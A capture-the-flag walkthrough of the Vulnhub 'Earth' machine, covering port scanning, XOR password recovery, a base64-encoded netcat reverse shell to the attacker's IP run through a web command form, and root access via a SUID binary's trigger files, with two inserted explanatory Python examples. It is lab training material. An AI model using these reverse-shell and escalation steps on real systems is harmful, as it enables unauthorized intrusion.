Walkthrough The Planet Series - Earth (Vulnhub)
Methodology
- Reconnaissance
- Enumeration
- Root Privilege Escalation
1. Reconnaissance
- Identify the IP address
fping -aqg 192.168.33.0/24
Result:
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ fping -aqg 192.168.33.0/24
192.168.33.1
192.168.33.2
192.168.33.3
192.168.33.5
192.168.33.9
Target: 192.168.33.9
- Scan open ports
nmap -v -T4 -p- -sC -sV -oN nmap.log 192.168.33.9
Result:
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ nmap -v -T4 -p- -sC -sV -oN nmap.log 192.168.33.9 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-26 14:40 WIB
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating NSE at 14:40
Completed NSE at 14:40, 0.00s elapsed
Initiating Ping Scan at 14:40
Scanning 192.168.33.9 [2 ports]
Completed Ping Scan at 14:40, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:40
Completed Parallel DNS resolution of 1 host. at 14:40, 2.52s elapsed
Initiating Connect Scan at 14:40
Scanning 192.168.33.9 [65535 ports]
Discovered open port 443/tcp on 192.168.33.9
Discovered open port 22/tcp on 192.168.33.9
Discovered open port 80/tcp on 192.168.33.9
Connect Scan Timing: About 14.52% done; ETC: 14:43 (0:03:03 remaining)
Connect Scan Timing: About 29.78% done; ETC: 14:43 (0:02:24 remaining)
Connect Scan Timing: About 44.52% done; ETC: 14:43 (0:01:53 remaining)
Connect Scan Timing: About 61.69% done; ETC: 14:43 (0:01:15 remaining)
Connect Scan Timing: About 80.55% done; ETC: 14:43 (0:00:36 remaining)
Completed Connect Scan at 14:43, 182.13s elapsed (65535 total ports)
Initiating Service scan at 14:43
Scanning 3 services on 192.168.33.9
Completed Service scan at 14:43, 12.05s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.33.9.
Initiating NSE at 14:43
Completed NSE at 14:43, 0.60s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 1.22s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Nmap scan report for 192.168.33.9
Host is up (0.0019s latency).
Not shown: 65345 filtered tcp ports (no-response), 187 filtered tcp ports (host-unreach)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after: 2031-10-10T23:26:31
| MD5: 4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
NSE: Script Post-scanning.
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Initiating NSE at 14:43
Completed NSE at 14:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 198.90 seconds
We found open ports 22/ssh, 80/http and 443/ssl.
From the SSL certificate above, we found 2 hostnames:
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
So I add these to the /etc/hosts file:
192.168.33.9 earth.local terratest.earth.local
2. Enumerate Webserver
We try accessing earth.local via the browser.
On that page, we find encrypted messages that were signed with a key.
Therefore, we have to identify the encryption technique. However, since we know it uses a message key, we have to identify that key first.
This information is located in robots.txt on the terratest.earth.local site.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ curl https://terratest.earth.local/robots.txt -k
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*
Here we can see there is a file "testingnotes.*". Since it is a set of notes, I guess it is a .txt file.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ curl https://terratest.earth.local/testingnotes.txt -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
From the notes, we can confirm that the encryption algorithm is XOR and that the key is probably taken from testdata.txt. Likewise, the username for the admin portal is terra. Also, the admin portal is /admin on the other website.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ curl https://terratest.earth.local/testdata.txt -k
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
With this information, we open CyberChef and search for XOR. We put the text above in CyberChef's key field with UTF-8 input. The resulting message gives us a possible password for the user terra.
We will try entering as input:
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
with the key for XOR:
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
Output:
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
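The CyberChef step above is plain repeating-key XOR. The following is an added example, not part of the walkthrough or the box's own code, that reproduces it in Python so the result is reproducible without CyberChef: it encrypts the testdata.txt paragraph (taken from the page) with the recovered password as the repeating key, then shows that anyone holding that known plaintext gets the key back by XORing it with the ciphertext. The function names xor_bytes, smallest_period and recover_key are my own.

```python
# Added example, not from the walkthrough: repeating-key XOR as used by the box's
# "secure messaging system", and why a known plaintext (testdata.txt) gives the key away.
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with key, repeating the key when data is longer (what CyberChef's XOR recipe does)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


def smallest_period(s: bytes) -> int:
    """Length of the shortest unit that repeats through s (len(s) if nothing repeats)."""
    for p in range(1, len(s)):
        if all(s[i] == s[i + p] for i in range(len(s) - p)):
            return p
    return len(s)


def recover_key(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """ciphertext XOR plaintext = key stream; trim the stream to one period of the repeating key.

    Only reliable when the known plaintext is at least as long as the key, as it is here.
    """
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
    return stream[:smallest_period(stream)]


# Constructed demo data: the password found on the box acts as the key,
# and the testdata.txt paragraph from the walkthrough is the known plaintext.
KEY = b"earthclimatechangebad4humans"
PLAINTEXT = (
    b"According to radiometric dating estimation and other evidence, Earth formed over "
    b"4.5 billion years ago. Within the first billion years of Earth's history, life appeared "
    b"in the oceans and began to affect Earth's atmosphere and surface, leading to the "
    b"proliferation of anaerobic and, later, aerobic organisms. Some geological evidence "
    b"indicates that life may have arisen as early as 4.1 billion years ago."
)
CIPHERTEXT = xor_bytes(PLAINTEXT, KEY)

if __name__ == "__main__":
    print("ciphertext (hex):", CIPHERTEXT.hex())
    # Same operation the walkthrough performs in CyberChef: message XOR testdata.txt
    print("key stream      :", xor_bytes(CIPHERTEXT, PLAINTEXT)[:60])
    print("recovered key   :", recover_key(CIPHERTEXT, PLAINTEXT))
```

The key stream printed by the second line is the endlessly repeated password seen in the CyberChef output; recover_key just cuts it at the first repeat. This is the whole weakness the testingnotes.txt author missed: XOR with a reused key is only as secret as the plaintext it was ever applied to, so publishing testdata.txt is equivalent to publishing the key.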
We will try the account terra:earthclimatechangebad4humans on the admin login page earth.local/admin.
When I tried to spawn a reverse shell, it said that remote connections are forbidden. This is because I used an IP address. So, we can bypass this by converting the address to its decimal notation. Alternatively, we can encode the command in base64.
Gateway Timeout
The gateway did not receive a timely response from the upstream server or application.
Try:
echo 'nc -e /bin/bash 192.168.33.5 9001' | base64
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ echo 'nc -e /bin/bash 192.168.33.5 9001' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMzMuNSA5MDAxCg==
Then I listened on port 9001:
nc -nlvp 9001
Enter the following command on the web page's command-run form:
echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMzMuNSA5MDAxCg== | base64 -d | bash
Result:
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [192.168.33.5] from (UNKNOWN) [192.168.33.9] 50356
Yes, we're in!
Use this to [upgrade to an intelligent reverse shell](https://nepcodex.com/2021/06/upgrade-to-an-intelligent-reverse-shell/):
python3 -c 'import pty;pty.spawn("/bin/bash")'
Result:
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$
3. Root Privilege Escalation
After I have a proper shell, I check for SUID binaries.
find / -perm -u=s 2>/dev/null
Result:
bash-5.1$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root # escalate from here.
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
When I check the strings, I see that it will change the root user's password.
strings /usr/bin/reset_root
Result:
bash-5.1$ strings /usr/bin/reset_root
strings /usr/bin/reset_root
/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
GCC: (GNU) 11.1.1 20210531 (Red Hat 11.1.1-3)
GCC: (GNU) 11.2.1 20210728 (Red Hat 11.2.1-1)
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
3g979
running gcc 11.1.1 20210531
annobin gcc 11.1.1 20210531
GA*GOW
GA+stack_clash
GA*cf_protection
GA*FORTIFY
GA+GLIBCXX_ASSERTIONS
GA+omit_frame_pointer
GA!stack_realign
/usr/lib/gcc/x86_64-redhat-linux/11/../../../../lib64/crt1.o
.annobin_lto
.annobin_lto_end
.annobin_lto.hot
.annobin_lto_end.hot
.annobin_lto.unlikely
.annobin_lto_end.unlikely
.annobin_lto.startup
.annobin_lto_end.startup
.annobin_lto.exit
.annobin_lto_end.exit
__abi_tag
.annobin__dl_relocate_static_pie.start
.annobin__dl_relocate_static_pie.end
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
reset_root_3.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
magic_cipher
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
_dl_relocate_static_pie
__bss_start
main
access@GLIBC_2.2.5
__TMC_END__
setuid@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got
.got.plt
.data
.bss
.comment
.gnu.build.attributes
Highlight:
bash-5.1$ strings /usr/bin/reset_root
/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
# ... snip ...
puts@GLIBC_2.2.5
_edata
system@GLIBC_2.2.5
__libc_start_main@GLIBC_2.2.5
magic_cipher
# ... snip ...
main
access@GLIBC_2.2.5
__TMC_END__
setuid@GLIBC_2.2.5
# ... snip ...
However, when I ran the binary, I got the message RESET FAILED, ... So, I copied the binary to my local machine.
I close port 9001
and try reconnecting using port 9002.
┌──(nel㉿nelliel)-[~]
└─$ echo 'nc -e /bin/bash 192.168.33.5 9002' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMzMuNSA5MDAyCg==
nc -nlvp 9002 > reset_root
cat /usr/bin/reset_root
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ nc -nlvp 9002 > reset_root
listening on [any] 9002 ...
connect to [192.168.33.5] from (UNKNOWN) [192.168.33.9] 39752
cat /usr/bin/reset_root
exit
Different source: by The Incredible World of n0x, on YouTube
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ ./reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ sudo apt install strace
┌──(nel㉿nelliel)-[~/vulnhub/theplanetsseries/earth]
└─$ strace -f ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffeddcbe7d8 /* 55 vars */) = 0
brk(NULL) = 0x1267000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=71299, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 71299, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f7054255000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0000y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0\320\276\243\212\v\307^\t\263h8\371\266h\r\350"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1835120, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7054253000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1868664, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f705408a000
mprotect(0x7f70540b0000, 1654784, PROT_NONE) = 0
mmap(0x7f70540b0000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7f70540b0000
mmap(0x7f70541f8000, 307200, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16e000) = 0x7f70541f8000
mmap(0x7f7054244000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b9000) = 0x7f7054244000
mmap(0x7f705424a000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f705424a000
close(3) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f7054088000
arch_prctl(ARCH_SET_FS, 0x7f7054254580) = 0
mprotect(0x7f7054244000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ) = 0
mprotect(0x7f7054296000, 8192, PROT_READ) = 0
munmap(0x7f7054255000, 71299) = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
brk(NULL) = 0x1267000
brk(0x1288000) = 0x1288000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0) = ?
+++ exited with 0 +++
Highlight:
/dev/shm/kHgTFI5G
/dev/shm/Zw7bV9U5
/tmp/kcM0Wewe
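Reading the three trigger paths out of a full strace dump by eye works for a 40-line trace, but not for a larger binary. The following is an added example, not part of the walkthrough, that does the same thing programmatically: it parses strace's one-syscall-per-line output, keeps the syscalls that take a path argument, and reports the paths the program probed but did not find (ENOENT). The sample trace is constructed from the lines shown above; the regex and the function names parse_file_syscalls and missing_files are my own.

```python
# Added example, not from the walkthrough: pull the file paths a binary probes out of strace
# output so an analyst can see which files a program checks for without reading its disassembly.
import re

# Matches lines such as:
#   access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
#   openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
# i.e. a syscall whose first (or, after AT_FDCWD, second) argument is a quoted path.
SYSCALL_RE = re.compile(
    r'^(?P<call>[a-z_0-9]+)\((?:AT_FDCWD, )?"(?P<path>[^"]+)"[^)]*\)\s*=\s*'
    r'(?P<ret>-?\d+)(?:\s+(?P<errno>E[A-Z]+))?'
)

# Probes made by the dynamic loader on every run; not interesting for the program itself.
LOADER_PROBES = {"/etc/ld.so.preload"}


def parse_file_syscalls(trace: str):
    """Yield (syscall, path, return value, errno or None) for each path-taking syscall line."""
    for line in trace.splitlines():
        m = SYSCALL_RE.match(line.strip())
        if m:
            yield m["call"], m["path"], int(m["ret"]), m["errno"]


def missing_files(trace: str, calls=("access", "stat", "open", "openat"), ignore=LOADER_PROBES):
    """Paths the program looked for via the given syscalls and did not find (ENOENT)."""
    return [
        path
        for call, path, ret, err in parse_file_syscalls(trace)
        if call in calls and err == "ENOENT" and path not in ignore
    ]


# Constructed sample: an abridged copy of the strace output from the walkthrough.
SAMPLE_TRACE = """\
execve("./reset_root", ["./reset_root"], 0x7ffeddcbe7d8 /* 55 vars */) = 0
brk(NULL) = 0x1267000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=71299, ...}, AT_EMPTY_PATH) = 0
close(3) = 0
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38) = 38
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44) = 44
exit_group(0) = ?
"""

if __name__ == "__main__":
    for path in missing_files(SAMPLE_TRACE):
        print(path)
```

Run against a real trace with strace -f -o trace.log ./binary and feed the file contents to missing_files. From a defensive angle the same parser answers the question an auditor should ask of any unexplained SUID binary: which world-writable locations (here /dev/shm and /tmp) does it consult before doing something privileged? A setuid program whose behaviour hinges on files any user can create is a finding on its own, independent of this box.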
Open netcat again:
nc -nlvp 9002
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
Reset the root password:
/usr/bin/reset_root
Yes, we did it! The root password has been reset to Earth.
Try accessing root:
bash-5.1$ su
su
Password: Earth
[root@earth /]# ls
ls
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
[root@earth /]# cd /root/
cd /root/
[root@earth ~]# ls
ls
anaconda-ks.cfg root_flag.txt
[root@earth ~]# cat root_flag.txt
cat root_flag.txt
_-o#&&*''''?d:>b\_
_o/"`'' '',, dMF9MMMMMHo_
.o&#' `"MbHMMMMMMMMMMMHo.
.o"" ' vodM*$&&HMMMMMMMMMM?.
,' $M&ood,~'`(&##MMMMMMH\
/ ,MMMMMMM#b?#bobMMMMHMMML
& ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
?$. :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
| |MMMMMMMMMMMMMMMMMMMMbMH' T,
$H#: `*MMMMMMMMMMMMMMMMMMMMb#}' `?
]MMH# ""*""""*#MMMMMMMMMMMMM' -
MMMMMb_ |MMMMMMMMMMMP' :
HMMMMMMMHo `MMMMMMMMMT .
?MMMMMMMMP 9MMMMMMMM} -
-?MMMMMMM |MMMMMMMMM?,d- '
:|MMMMMM- `MMMMMMMT .M|. :
.9MMM[ &MMMMM*' `' .
:9MMk `MMM#" -
&M} ` .-
`&. .
`~, . ./
. _ .-
'`--._,dd###pp=""'
Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]
[root@earth ~]#
Reference: nepcodex.com by Krishna Upadhyay